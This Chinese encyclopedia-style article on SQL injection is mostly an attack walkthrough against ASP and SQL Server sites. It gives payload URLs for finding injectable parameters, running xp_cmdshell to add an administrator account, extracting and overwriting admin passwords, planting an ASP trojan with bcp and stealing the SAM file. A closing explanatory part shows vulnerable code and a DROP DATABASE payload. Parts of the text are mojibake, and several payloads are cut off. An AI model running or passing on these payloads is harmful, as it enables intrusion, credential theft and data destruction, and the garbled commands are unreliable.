百科解釋
SQL注入攻擊是黑客對(duì)數(shù)據(jù)庫進(jìn)行攻擊的常用手段之一。隨著B/S模式應(yīng)用開發(fā)的發(fā)展,使用這種模式編寫應(yīng)用程序的程序員也越來越多。但是由于程序員的水平及經(jīng)驗(yàn)也參差不齊,相當(dāng)大一部分程序員在編寫代碼的時(shí)候,沒有對(duì)用戶輸入數(shù)據(jù)的合法性進(jìn)行判斷,使應(yīng)用程序存在安全隱患。用戶可以提交一段數(shù)據(jù)庫查詢代碼,根據(jù)程序返回的結(jié)果,獲得某些他想得知的數(shù)據(jù),這就是所謂的SQL Injection,即SQL注入。SQL注入是從正常的WWW端口訪問,而且表面看起來跟一般的Web頁面訪問沒什么區(qū)別,所以目前市面的防火墻都不會(huì)對(duì)SQL注入發(fā)出警報(bào),如果管理員沒查看IIS日志的習(xí)慣,可能被入侵很長時(shí)間都不會(huì)發(fā)覺。但是,SQL注入的手法相當(dāng)靈活,在注入的時(shí)候會(huì)碰到很多意外的情況,需要構(gòu)造巧妙的SQL語句,從而成功獲取想要的數(shù)據(jù)。 SQL注入攻擊的總體思路 ·發(fā)現(xiàn)SQL注入位置; ·判斷后臺(tái)數(shù)據(jù)庫類型; ·確定XP_CMDSHELL可執(zhí)行情況 ·發(fā)現(xiàn)WEB虛擬目錄 ·上傳ASP木馬; ·得到管理員權(quán)限; SQL注入攻擊的步驟 一、SQL注入漏洞的判斷 一般來說,SQL注入一般存在于形如:HTTP://xxx.xxx.xxx/abc.asp?id=XX等帶有參數(shù)的ASP動(dòng)態(tài)網(wǎng)頁中,有時(shí)一個(gè)動(dòng)態(tài)網(wǎng)頁中可能只有一個(gè)參數(shù),有時(shí)可能有N個(gè)參數(shù),有時(shí)是整型參數(shù),有時(shí)是字符串型參數(shù),不能一概而論?傊灰菐в袇(shù)的動(dòng)態(tài)網(wǎng)頁且此網(wǎng)頁訪問了數(shù)據(jù)庫,那么就有可能存在SQL注入。如果ASP程序員沒有安全意識(shí),不進(jìn)行必要的字符過濾,存在SQL注入的可能性就非常大。 為了全面了解動(dòng)態(tài)網(wǎng)頁回答的信息,首選請(qǐng)調(diào)整IE的配置。把IE菜單-工具-Internet選項(xiàng)-高級(jí)-顯示友好HTTP錯(cuò)誤信息前面的勾去掉。 為了把問題說明清楚,以下以HTTP://xxx.xxx.xxx/abc.asp?p=YY為例進(jìn)行分析,YY可能是整型,也有可能是字符串。 1、整型參數(shù)的判斷 當(dāng)輸入的參數(shù)YY為整型時(shí),通常abc.asp中SQL語句原貌大致如下: select * from 表名 where 字段=YY,所以可以用以下步驟測試SQL注入是否存在。 、貶TTP://xxx.xxx.xxx/abc.asp?p=YY’(附加一個(gè)單引號(hào)),此時(shí)abc.ASP中的SQL語句變成了 select * from 表名 where 字段=YY’,abc.asp運(yùn)行異常; ②HTTP://xxx.xxx.xxx/abc.asp?p=YY and 1=1, abc.asp運(yùn)行正常,而且與HTTP://xxx.xxx.xxx/abc.asp?p=YY運(yùn)行結(jié)果相同; 、跦TTP://xxx.xxx.xxx/abc.asp?p=YY and 1=2, abc.asp運(yùn)行異常; 如果以上三步全面滿足,abc.asp中一定存在SQL注入漏洞。 2、字符串型參數(shù)的判斷 當(dāng)輸入的參數(shù)YY為字符串時(shí),通常abc.asp中SQL語句原貌大致如下: select * from 表名 where 字段=&#039;YY&#039;,所以可以用以下步驟測試SQL注入是否存在。 ①HTTP://xxx.xxx.xxx/abc.asp?p=YY’(附加一個(gè)單引號(hào)),此時(shí)abc.ASP中的SQL語句變成了 select * from 表名 where 字段=YY’,abc.asp運(yùn)行異常; ②HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb ... 39;1&#039;=&#039;1&#039;, abc.asp運(yùn)行正常,而且與HTTP://xxx.xxx.xxx/abc.asp?p=YY運(yùn)行結(jié)果相同; 、跦TTP://xxx.xxx.xxx/abc.asp?p=YY&nb ... 39;1&#039;=&#039;2&#039;, abc.asp運(yùn)行異常; 如果以上三步全面滿足,abc.asp中一定存在SQL注入漏洞。 3、特殊情況的處理 有時(shí)ASP程序員會(huì)在程序員過濾掉單引號(hào)等字符,以防止SQL注入。此時(shí)可以用以下幾種方法試一試。 、俅笮《ɑ旌戏ǎ河捎赩BS并不區(qū)分大小寫,而程序員在過濾時(shí)通常要么全部過濾大寫字符串,要么全部過濾小寫字符串,而大小寫混合往往會(huì)被忽視。如用SelecT代替select,SELECT等; 、赨NICODE法:在IIS中,以UNICODE字符集實(shí)現(xiàn)國際化,我們完全可以IE中輸入的字符串化成UNICODE字符串進(jìn)行輸入。如+ =%2B,空格=%20 等;URLEncode信息參見附件一; 、跘SCII碼法:可以把輸入的部分或全部字符全部用ASCII碼代替,如U=chr(85),a=chr(97)等,ASCII信息參見附件二; 二、分析數(shù)據(jù)庫服務(wù)器類型 一般來說,ACCESS與SQL-SERVER是最常用的數(shù)據(jù)庫服務(wù)器,盡管它們都支持T-SQL標(biāo)準(zhǔn),但還有不同之處,而且不同的數(shù)據(jù)庫有不同的攻擊方法,必須要區(qū)別對(duì)待。 1、 利用數(shù)據(jù)庫服務(wù)器的系統(tǒng)變量進(jìn)行區(qū)分 SQL-SERVER有user,db_name()等系統(tǒng)變量,利用這些系統(tǒng)值不僅可以判斷SQL-SERVER,而且還可以得到大量有用信息。如: 、 HTTP://xxx.xxx.xxx/abc.asp?p=YY and user>0 不僅可以判斷是否是SQL-SERVER,而還可以得到當(dāng)前連接到數(shù)據(jù)庫的用戶名 、贖TTP://xxx.xxx.xxx/abc.asp?p=YY&n ... db_name()>0 不僅可以判斷是否是SQL-SERVER,而還可以得到當(dāng)前正在使用的數(shù)據(jù)庫名; 2、利用系統(tǒng)表 ACCESS的系統(tǒng)表是msysobjects,且在WEB環(huán)境下沒有訪問權(quán)限,而SQL-SERVER的系統(tǒng)表是sysobjects,在WEB環(huán)境下有訪問權(quán)限。對(duì)于以下兩條語句: 、貶TTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from sysobjects)>0 ②HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from msysobjects)>0 若數(shù)據(jù)庫是SQL-SERVE,則第一條,abc.asp一定運(yùn)行正常,第二條則異常;若是ACCESS則兩條都會(huì)異常。 3、 MSSQL三個(gè)關(guān)鍵系統(tǒng)表 sysdatabases系統(tǒng)表:Microsoft SQL Server 上的每個(gè)數(shù)據(jù)庫在表中占一行。最初安裝 SQL Server 時(shí),sysdatabases 包含 master、model、msdb、mssqlweb 和 tempdb 數(shù)據(jù)庫的項(xiàng)。該表只存儲(chǔ)在 master 數(shù)據(jù)庫中。 這個(gè)表保存在master數(shù)據(jù)庫中,這個(gè)表中保存的是什么信息呢?這個(gè)非常重要。他是 保存了所有的庫名,以及庫的ID和一些相關(guān)信息。 這里我把對(duì)于我們有用的字段名稱和相關(guān)說明給大家列出來。name //表示庫的名字。 dbid //表示庫的ID,dbid從1到5是系統(tǒng)的。分別是:master、model、msdb、mssqlweb、tempdb 這五個(gè)庫。用select * from master.dbo.sysdatabases 就可以查詢出所有的庫名。 Sysobjects:SQL-SERVER的每個(gè)數(shù)據(jù)庫內(nèi)都有此系統(tǒng)表,它存放該數(shù)據(jù)庫內(nèi)創(chuàng)建的所有對(duì)象,如約束、默認(rèn)值、日志、規(guī)則、存儲(chǔ)過程等,每個(gè)對(duì)象在表中占一行。 syscolumns:每個(gè)表和視圖中的每列在表中占一行,存儲(chǔ)過程中的每個(gè)參數(shù)在表中也占一行。該表位于每個(gè)數(shù)據(jù)庫中。主要字段有: name ,id, colid :分別是字段名稱,表ID號(hào),字段ID號(hào),其中的 ID 是 剛上我們用sysobjects得到的表的ID號(hào)。 用: select * from ChouYFD.dbo.syscolumns where id=123456789 得到ChouYFD這個(gè)庫中,表的ID是123456789中的所有字段列表。 三、確定XP_CMDSHELL可執(zhí)行情況 若當(dāng)前連接數(shù)據(jù)的帳號(hào)具有SA權(quán)限,且master.dbo.xp_cmdshell擴(kuò)展存儲(chǔ)過程(調(diào)用此存儲(chǔ)過程可以直接使用操作系統(tǒng)的shell)能夠正確執(zhí)行,則整個(gè)計(jì)算機(jī)可以通過以下幾種方法完全控制,以后的所有步驟都可以省 1、HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb ... er>0 abc.asp執(zhí)行異常但可以得到當(dāng)前連接數(shù)據(jù)庫的用戶名(若顯示dbo則代表SA)。 2、HTTP://xxx.xxx.xxx/abc.asp?p=YY ... me()>0 abc.asp執(zhí)行異常但可以得到當(dāng)前連接的數(shù)據(jù)庫名。 3、HTTP://xxx.xxx.xxx/abc.asp?p=YY;exec master..xp_cmdshell “net user aaa bbb /add”-- (master是SQL-SERVER的主數(shù)據(jù)庫;名中的分號(hào)表示SQL-SERVER執(zhí)行完分號(hào)前的語句名,繼續(xù)執(zhí)行其后面的語句;“—”號(hào)是注解,表示其后面的所有內(nèi)容僅為注釋,系統(tǒng)并不執(zhí)行)可以直接增加操作系統(tǒng)帳戶aaa,密碼為bbb。 4、HTTP://xxx.xxx.xxx/abc.asp?p=YY;exec master..xp_cmdshell “net localgroup administrators aaa /add”-- 把剛剛增加的帳戶aaa加到administrators組中。 5、HTTP://xxx.xxx.xxx/abc.asp?p=YY;backuup database 數(shù)據(jù)庫名 to disk=&#039;c:inetpubwwwrootsave.db&#039; 則把得到的數(shù)據(jù)內(nèi)容全部備份到WEB目錄下,再用HTTP把此文件下載(當(dāng)然首選要知道WEB虛擬目錄)。 6、通過復(fù)制CMD創(chuàng)建UNICODE漏洞 HTTP://xxx.xxx.xxx/abc.asp?p=YY;exe ... dbo.xp_cmdshell “copy c:winntsystem32cmd.exe c:inetpubs criptscmd.exe” 便制造了一個(gè)UNICODE漏洞,通過此漏洞的利用方法,便完成了對(duì)整個(gè)計(jì)算機(jī)的控制(當(dāng)然首選要知道WEB虛擬目錄)。 四、發(fā)現(xiàn)WEB虛擬目錄 只有找到WEB虛擬目錄,才能確定放置ASP木馬的位置,進(jìn)而得到USER權(quán)限。有兩種方法比較有效。 一是根據(jù)經(jīng)驗(yàn)猜解,一般來說,WEB虛擬目錄是:c:inetpubwwwroot; D:inetpubwwwroot; E:inetpubwwwroot等,而可執(zhí)行虛擬目錄是:c:inetpubs cripts; D:inetpubs cripts; E:inetpubs cripts等。 二是遍歷系統(tǒng)的目錄結(jié)構(gòu),分析結(jié)果并發(fā)現(xiàn)WEB虛擬目錄; 先創(chuàng)建一個(gè)臨時(shí)表:temp HTTP://xxx.xxx.xxx/abc.asp?p=YY;create&n ... mp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 接下來: 。1)利用xp_availablemedia來獲得當(dāng)前所有驅(qū)動(dòng)器,并存入temp表中: HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert temp ... ter.dbo.xp_availablemedia;-- 我們可以通過查詢temp的內(nèi)容來獲得驅(qū)動(dòng)器列表及相關(guān)信息 。2)利用xp_subdirs獲得子目錄列表,并存入temp表中: HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(i ... dbo.xp_subdirs &#039;c:&#039;;-- 。3)利用xp_dirtree獲得所有子目錄的目錄樹結(jié)構(gòu),并寸入temp表中: HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id,num1) exec master.dbo.xp_dirtree &#039;c:&#039;;-- 注意: 1、以上每完成一項(xiàng)瀏覽后,應(yīng)刪除TEMP中的所有內(nèi)容,刪除方法是: HTTP://xxx.xxx.xxx/abc.asp?p=YY;delete from temp;-- 2、瀏覽TEMP表的方法是:(假設(shè)TestDB是當(dāng)前連接的數(shù)據(jù)庫名) HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top& ... nbsp;TestDB.dbo.temp )>0 得到表TEMP中第一條記錄id字段的值,并與整數(shù)進(jìn)行比較,顯然abc.asp工作異常,但在異常中卻可以發(fā)現(xiàn)id字段的值。假設(shè)發(fā)現(xiàn)的表名是xyz,則 HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 id from ... ere id not in(&#039;xyz&#039;))>0 得到表TEMP中第二條記錄id字段的值。 五、上傳ASP木馬 所謂ASP木馬,就是一段有特殊功能的ASP代碼,并放入WEB虛擬目錄的s cripts下,遠(yuǎn)程客戶通過IE就可執(zhí)行它,進(jìn)而得到系統(tǒng)的USER權(quán)限,實(shí)現(xiàn)對(duì)系統(tǒng)的初步控制。上傳ASP木馬一般有兩種比較有效的方法: 1、利用WEB的遠(yuǎn)程管理功能 許多WEB站點(diǎn),為了維護(hù)的方便,都提供了遠(yuǎn)程管理的功能;也有不少WEB站點(diǎn),其內(nèi)容是對(duì)于不同的用戶有不同的訪問權(quán)限。為了達(dá)到對(duì)用戶權(quán)限的控制,都有一個(gè)網(wǎng)頁,要求用戶名與密碼,只有輸入了正確的值,才能進(jìn)行下一步的操作,可以實(shí)現(xiàn)對(duì)WEB的管理,如上傳、下載文件,目錄瀏覽、修改配置等。 因此,若獲取正確的用戶名與密碼,不僅可以上傳ASP木馬,有時(shí)甚至能夠直接得到USER權(quán)限而瀏覽系統(tǒng),上一步的“發(fā)現(xiàn)WEB虛擬目錄”的復(fù)雜操作都可省略。 用戶名及密碼一般存放在一張表中,發(fā)現(xiàn)這張表并讀取其中內(nèi)容便解決了問題。以下給出兩種有效方法。 A、 注入法: 從理論上說,認(rèn)證網(wǎng)頁中會(huì)有型如: select * from admin where username=&#039;XXX&#039; and password=&#039;YYY&#039; 的語句,若在正式運(yùn)行此句之前,沒有進(jìn)行必要的字符過濾,則很容易實(shí)施SQL注入。 如在用戶名文本框內(nèi)輸入:abc’ or 1=1-- 在密碼框內(nèi)輸入:123 則SQL語句變成: select * from admin where username=&#039;abc’ or 1=1 and password=&#039;123’ 不管用戶輸入任何用戶名與密碼,此語句永遠(yuǎn)都能正確執(zhí)行,用戶輕易騙過系統(tǒng),獲取合法身份。 B、猜解法: 基本思路是:猜解所有數(shù)據(jù)庫名稱,猜出庫中的每張表名,分析可能是存放用戶名與密碼的表名,猜出表中的每個(gè)字段名,猜出表中的每條記錄內(nèi)容。 猜解所有數(shù)據(jù)庫名稱 HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) <>0 因?yàn)?dbid 的值從1到5,是系統(tǒng)用了。所以用戶自己建的一定是從6開始的。并且我們提交了 name>1 (name字段是一個(gè)字符型的字段和數(shù)字比較會(huì)出錯(cuò)),abc.asp工作異常,可得到第一個(gè)數(shù)據(jù)庫名,同理把DBID分別改成7,8,9,10,11,12…就可得到所有數(shù)據(jù)庫名。 以下假設(shè)得到的數(shù)據(jù)庫名是TestDB。 猜解數(shù)據(jù)庫中用戶名表的名稱 猜解法:此方法就是根據(jù)個(gè)人的經(jīng)驗(yàn)猜表名,一般來說,user,users,member,members,userlist,memberlist,userinfo,manager,admin,adminuser,systemuser,systemusers,sysuser,sysusers,sysaccounts,systemaccounts等。并通過語句進(jìn)行判斷 HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from TestDB.dbo.表名)>0 若表名存在,則abc.asp工作正常,否則異常。如此循環(huán),直到猜到系統(tǒng)帳號(hào)表的名稱。 讀取法:SQL-SERVER有一個(gè)存放系統(tǒng)核心信息的表sysobjects,有關(guān)一個(gè)庫的所有表,視圖等信息全部存放在此表中,而且此表可以通過WEB進(jìn)行訪問。 當(dāng)xtype=&#039;U&#039; and status>0代表是用戶建立的表,發(fā)現(xiàn)并分析每一個(gè)用戶建立的表及名稱,便可以得到用戶名表的名稱,基本的實(shí)現(xiàn)方法是: 、貶TTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 name from TestD ... type=&#039;U&#039; and status>0 )>0 得到第一個(gè)用戶建立表的名稱,并與整數(shù)進(jìn)行比較,顯然abc.asp工作異常,但在異常中卻可以發(fā)現(xiàn)表的名稱。假設(shè)發(fā)現(xiàn)的表名是xyz,則 、贖TTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 name from TestDB.dbo.sysobjects& ... tatus>0 and name not in(&#039;xyz&#039;))>0 可以得到第二個(gè)用戶建立的表的名稱,同理就可得到所有用建立的表的名稱。 根據(jù)表的名稱,一般可以認(rèn)定那張表用戶存放用戶名及密碼,以下假設(shè)此表名為Admin。 l 猜解用戶名字段及密碼字段名稱 admin表中一定有一個(gè)用戶名字段,也一定有一個(gè)密碼字段,只有得到此兩個(gè)字段的名稱,才有可能得到此兩字段的內(nèi)容。如何得到它們的名稱呢,同樣有以下兩種方法。 猜解法:此方法就是根據(jù)個(gè)人的經(jīng)驗(yàn)猜字段名,一般來說,用戶名字段的名稱常用:username,name,user,account等。而密碼字段的名稱常用:password,pass,pwd,passwd等。并通過語句進(jìn)行判斷 HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(字段名) from TestDB.dbo.admin)>0 “select count(字段名) from 表名”語句得到表的行數(shù),所以若字段名存在,則abc.asp工作正常,否則異常。如此循環(huán),直到猜到兩個(gè)字段的名稱。 讀取法:基本的實(shí)現(xiàn)方法是 HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select ... me(object_id(&#039;admin&#039;),1) from TestDB.dbo.sysobjects)>0 。select top 1 col_name(object_id(&#039;admin&#039;),1) from TestDB.dbo.sysobjects是從sysobjects得到已知表名的第一個(gè)字段名,當(dāng)與整數(shù)進(jìn)行比較,顯然abc.asp工作異常,但在異常中卻可以發(fā)現(xiàn)字段的名稱。把col_name(object_id(&#039;admin&#039;),1)中的1依次換成2,3,4,5,6…就可得到所有的字段名稱。 l 猜解用戶名與密碼 猜用戶名與密碼的內(nèi)容最常用也是最有效的方法有: ASCII碼逐字解碼法:雖然這種方法速度較慢,但肯定是可行的;镜乃悸肥窍炔鲁鲎侄蔚拈L度,然后依次猜出每一位的值。猜用戶名與猜密碼的方法相同,以下以猜用戶名為例說明其過程。 HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top&n ... nbsp;from TestDB.dbo.admin)=X(X=1,2,3,4,5,… n,username為用戶名字段的名稱,admin為表的名稱),若x為某一值i且abc.asp運(yùn)行正常時(shí),則i就是第一個(gè)用戶名的長度。如:當(dāng)輸入 HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top ... e) from TestDB.dbo.admin)=8時(shí)abc.asp運(yùn)行正常,則第一個(gè)用戶名的長度為8 HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring(username,m,1)) from TestDB.dbo.admin)=n (m的值在1到上一步得到的用戶名長度之間,當(dāng)m=1,2,3,…時(shí)猜測分別猜測第1,2,3,…位的值;n的值是1~9、a~z、A~Z的ASCII值,也就是1~128之間的任意值;admin為系統(tǒng)用戶帳號(hào)表的名稱),若n為某一值i且abc.asp運(yùn)行正常時(shí),則i對(duì)應(yīng)ASCII碼就是用戶名某一位值。如:當(dāng)輸入 HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring(username,3,1)) from TestDB.dbo.admin)=80時(shí)abc.asp運(yùn)行正常,則用戶名的第三位為P(P的ASCII為80); HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring(username,9,1)) from TestDB.dbo.admin)=33時(shí)abc.asp運(yùn)行正常,則用戶名的第9位為!(!的ASCII為80); 猜到第一個(gè)用戶名及密碼后,同理,可以猜出其他所有用戶名與密碼。注意:有時(shí)得到的密碼可能是經(jīng)MD5等方式加密后的信息,還需要用專用工具進(jìn)行脫密;蛘呦雀钠涿艽a,使用完后再改回來,見下面說明。 簡單法:猜用戶名用 HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 ... o.admin where username>1) , flag是admin表中的一個(gè)字段,username是用戶名字段,此時(shí)abc.asp工作異常,但能得到Username的值。與上同樣的方法,可以得到第二用戶名,第三個(gè)用戶等等,直到表中的所有用戶名。 猜用戶密碼:HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1&nb ... B.dbo.admin where pwd>1) , flag是admin表中的一個(gè)字段,pwd是密碼字段,此時(shí)abc.asp工作異常,但能得到pwd的值。與上同樣的方法,可以得到第二用戶名的密碼,第三個(gè)用戶的密碼等等,直到表中的所有用戶的密碼。密碼有時(shí)是經(jīng)MD5加密的,可以改密碼。 HTTP://xxx.xxx.xxx/abc.asp?p=YY;update TestDB.dbo.admin set pwd=&#039; ... where username=&#039;www&#039;;-- ( 1的MD5值為:AAABBBCCCDDDEEEF,即把密碼改成1;www為已知的用戶名) 用同樣的方法當(dāng)然可把密碼改原來的值。 2、利用表內(nèi)容導(dǎo)成文件功能 SQL有BCP命令,它可以把表的內(nèi)容導(dǎo)成文本文件并放到指定位置。利用這項(xiàng)功能,我們可以先建一張臨時(shí)表,然后在表中一行一行地輸入一個(gè)ASP木馬,然后用BCP命令導(dǎo)出形成ASP文件。 命令行格式如下: bcp "select * from text..foo" queryout c:inetpubwwwroot uncommand.asp –c –S localhost –U sa –P foobar (&#039;S&#039;參數(shù)為執(zhí)行查詢的服務(wù)器,&#039;U&#039;參數(shù)為用戶名,&#039;P&#039;參數(shù)為密碼,最終上傳了一個(gè)runcommand.asp的木馬) 六、得到系統(tǒng)的管理員權(quán)限 ASP木馬只有USER權(quán)限,要想獲取對(duì)系統(tǒng)的完全控制,還要有系統(tǒng)的管理員權(quán)限。怎么辦?提升權(quán)限的方法有很多種: 上傳木馬,修改開機(jī)自動(dòng)運(yùn)行的.ini文件(它一重啟,便死定了); 復(fù)制CMD.exe到s cripts,人為制造UNICODE漏洞; 下載SAM文件,破解并獲取OS的所有用戶名密碼; 等等,視系統(tǒng)的具體情況而定,可以采取不同的方法。 七、幾個(gè)SQL-SERVER專用手段 1、利用xp_regread擴(kuò)展存儲(chǔ)過程修改注冊表 [xp_regread]另一個(gè)有用的內(nèi)置存儲(chǔ)過程是xp_regXXXX類的函數(shù)集合(Xp_regaddmultistring,Xp_regdeletekey,Xp_regdeletevalue,Xp_regenumkeys,Xp_regenumvalues,Xp_regread,Xp_regremovemultistring,Xp_regwrite)。攻擊者可以利用這些函數(shù)修改注冊表,如讀取SAM值,允許建立空連接,開機(jī)自動(dòng)運(yùn)行程序等。如: exec xp_regread HKEY_LOCAL_MACHINE,&#039;SYSTEMCurrentControlSetServiceslanmanserverparameters&#039;, &#039;nullsessionshares&#039; 確定什么樣的會(huì)話連接在服務(wù)器可用。 exec xp_regenumvalues HKEY_LOCAL_MACHINE,&#039;SYSTEMCurrentControlSetServicessnmpparametersvalidcommunities&#039; 顯示服務(wù)器上所有SNMP團(tuán)體配置,有了這些信息,攻擊者或許會(huì)重新配置同一網(wǎng)絡(luò)中的網(wǎng)絡(luò)設(shè)備。 2、利用其他存儲(chǔ)過程去改變服務(wù)器 xp_servicecontrol過程允許用戶啟動(dòng),停止服務(wù)。如: (exec master..xp_servicecontrol &#039;start&#039;,&#039;schedule&#039; exec master..xp_servicecontrol &#039;start&#039;,&#039;server&#039;) Xp_availablemedia 顯示機(jī)器上有用的驅(qū)動(dòng)器 Xp_dirtree 允許獲得一個(gè)目錄樹 Xp_enumdsn 列舉服務(wù)器上的ODBC數(shù)據(jù)源 Xp_loginconfig 獲取服務(wù)器安全信息 Xp_makecab 允許用戶在服務(wù)器上創(chuàng)建一個(gè)壓縮文件 Xp_ntsec_enumdomains 列舉服務(wù)器可以進(jìn)入的域 Xp_terminate_process 提供進(jìn)程的進(jìn)程ID,終止此進(jìn)程 SQL注入攻擊的背景 在計(jì)算機(jī)技術(shù)高速發(fā)展的今天,越來越讓人們頭疼的是面臨越來越“變態(tài)”和復(fù)雜的威脅網(wǎng)站技術(shù),他們利用Internet 執(zhí)行各種惡意活動(dòng),如身份竊取、私密信息竊取、帶寬資源占用等。它們潛入之后,還會(huì)擴(kuò)散并不斷更新自己。這些活動(dòng)常常利用用戶的好奇心,在用戶不知道或未來允許的情況下潛入用戶的PC,不知不覺中,帳戶里的資金就被轉(zhuǎn)移了,公司訊息也被傳送出去,危害十分嚴(yán)重。2006年8月16日,第一個(gè)Web威脅樣本出現(xiàn),截止到2006年10月25日,已經(jīng)產(chǎn)生了第150個(gè)變種,并且,還在不斷地演化下去。 網(wǎng)站威脅的目標(biāo)定位有多個(gè)維度,是個(gè)人還是公司,還是某種行業(yè),都有其考慮,甚至國家、地區(qū)、性別、種族、宗教等也成為發(fā)動(dòng)攻擊的原因或動(dòng)機(jī)。攻擊還會(huì)采用多種形態(tài),甚至是復(fù)合形態(tài),比如病毒、蠕蟲、特洛伊、間諜軟件、僵尸、網(wǎng)絡(luò)釣魚電子郵件、漏洞利用、下載程序、社會(huì)工程、rootkit、黑客,結(jié)果都可以導(dǎo)致用戶信息受到危害,或者導(dǎo)致用戶所需的服務(wù)被拒絕和劫持。從其來源說Web威脅還可以分為內(nèi)部攻擊和外部攻擊兩類。前者主要來自信任網(wǎng)絡(luò),可能是用戶執(zhí)行了未授權(quán)訪問或是無意中定制了惡意攻擊;后者主要是由于網(wǎng)絡(luò)漏洞被利用或者用戶受到惡意程序制定者的專一攻擊。 SQL注入攻擊的網(wǎng)絡(luò)分析 SQL注入攻擊是非常令人討厭的安全漏洞,是所有的web開發(fā)人員,不管是什么平臺(tái),技術(shù),還是數(shù)據(jù)層,需要確信他們理解和防止的東西。不幸的是,開發(fā)人員往往不集中花點(diǎn)時(shí)間在這上面,以至他們的應(yīng)用,更糟糕的是,他們的客戶極其容易受到攻擊。 Michael Sutton 最近發(fā)表了一篇非常發(fā)人深省的帖子,講述在公共網(wǎng)上這問題是多么地普遍。他用Google的Search API建了一個(gè)C#的客戶端程序,尋找那些易受SQL 注入攻擊的網(wǎng)站。其步驟很簡單: 1,尋找那些帶查詢字符串的網(wǎng)站(例如,查詢那些在URL里帶有 "id=" 的URL) 2,給這些確定為動(dòng)態(tài)的網(wǎng)站發(fā)送一個(gè)請(qǐng)求,改變其中的id=語句,帶一個(gè)額外的單引號(hào),來試圖取消其中的SQL語句(例如,如 id=6&#039; ) 3,分析返回的回復(fù),在其中查找象“SQL” 和“query”這樣的詞,這往往表示應(yīng)用返回了詳細(xì)的錯(cuò)誤消息(這本身也是很糟糕的) 4,檢查錯(cuò)誤消息是否表示發(fā)送到SQL服務(wù)器的參數(shù)沒有被正確加碼(encoded),如果如此,那么表示可對(duì)該網(wǎng)站進(jìn)行SQL注入攻擊 對(duì)通過Google搜尋找到的1000個(gè)網(wǎng)站的隨機(jī)取樣測試,他檢測到其中的11.3%有易受SQL注入攻擊的可能。這非常,非常地可怕。這意味著黑客可以遠(yuǎn)程利用那些應(yīng)用里的數(shù)據(jù),獲取任何沒有hashed或加密的密碼或信用卡數(shù)據(jù),甚至有以管理員身份登陸進(jìn)這些應(yīng)用的可能。這不僅對(duì)開發(fā)網(wǎng)站的開發(fā)人員來說很糟糕,而且對(duì)使用網(wǎng)站的消費(fèi)者或用戶來說更糟糕,因?yàn)樗麄兘o網(wǎng)站提供了數(shù)據(jù),想著網(wǎng)站是安全的呢。 那么SQL注入攻擊到底是什么玩意? 有幾種情形使得SQL注入攻擊成為可能。最常見的原因是,你動(dòng)態(tài)地構(gòu)造了SQL語句,卻沒有使用正確地加了碼(encoded)的參數(shù)。譬如,考慮這個(gè)SQL查詢的編碼,其目的是根據(jù)由查詢字符串提供的社會(huì)保險(xiǎn)號(hào)碼(social security number)來查詢作者(Authors): Dim SSN as String Dim SqlQuery as String SSN = Request.QueryString("SSN") SqlQuery = "SELECT au_lname, au_fname FROM authors WHERE au_id = &#039;" + SSN + "&#039;" 如果你有象上面這個(gè)片斷一樣的SQL編碼,那么你的整個(gè)數(shù)據(jù)庫和應(yīng)用可以遠(yuǎn)程地被黑掉。怎么會(huì)呢?在普通情形下,用戶會(huì)使用一個(gè)社會(huì)保險(xiǎn)號(hào)碼來訪問這個(gè)網(wǎng)站,編碼是象這樣執(zhí)行的: &#039; URL to the page containing the above code http://mysite.com/listauthordetails.aspx?SSN=172-32-9999 &#039; SQL Query executed against the database SELECT au_lname, au_fname FROM authors WHERE au_id = &#039;172-32-9999&#039; 這是開發(fā)人員預(yù)期的做法,通過社會(huì)保險(xiǎn)號(hào)碼來查詢數(shù)據(jù)庫中作者的信息。但因?yàn)閰?shù)值沒有被正確地加碼,黑客可以很容易地修改查詢字符串的值,在要執(zhí)行的值后面嵌入附加的SQL語句 。譬如, &#039; URL to the page containing the above code http://mysite.com/listauthordetails.aspx?SSN=172-32-9999&#039;;DROP DATABASE pubs -- &#039; SQL Query executed against the database SELECT au_lname, au_fname FROM authors WHERE au_id = &#039;&#039;;DROP DATABASE pubs -- 注意到?jīng)]有,可以在SSN查詢字符串值的后面添加“ &#039;;DROP DATABASE pubs -- ”,通過 “;”字符來終止當(dāng)前的SQL語句,然后添加了自己的惡意的SQL語句,然后把語句的其他部分用“--”字符串注釋掉。因?yàn)槭鞘止ぴ诰幋a里構(gòu)造SQL語句,最后把這個(gè)字符串傳給了數(shù)據(jù)庫,數(shù)據(jù)庫會(huì)先對(duì)authors表進(jìn)行查詢,然后把我們的pubs數(shù)據(jù)庫刪除!芭(bang)”的一聲,數(shù)據(jù)庫就沒了! 萬一你認(rèn)為匿名黑客刪除你的數(shù)據(jù)庫的結(jié)果很壞,但不幸的是,實(shí)際上,這在SQL注入攻擊所涉及的情形中算是比較好的。一個(gè)黑客可以不單純摧毀數(shù)據(jù),而是使用上面這個(gè)編碼的弱點(diǎn),執(zhí)行一個(gè)JOIN語句,來獲取你數(shù)據(jù)庫里的所有數(shù)據(jù),顯示在頁面上,允許他們獲取用戶名,密碼,信用卡號(hào)碼等等。他們也可以添加 UPDATE/INSERT 語句改變產(chǎn)品的價(jià)格,添加新的管理員賬號(hào),真的搞砸你(screw up your 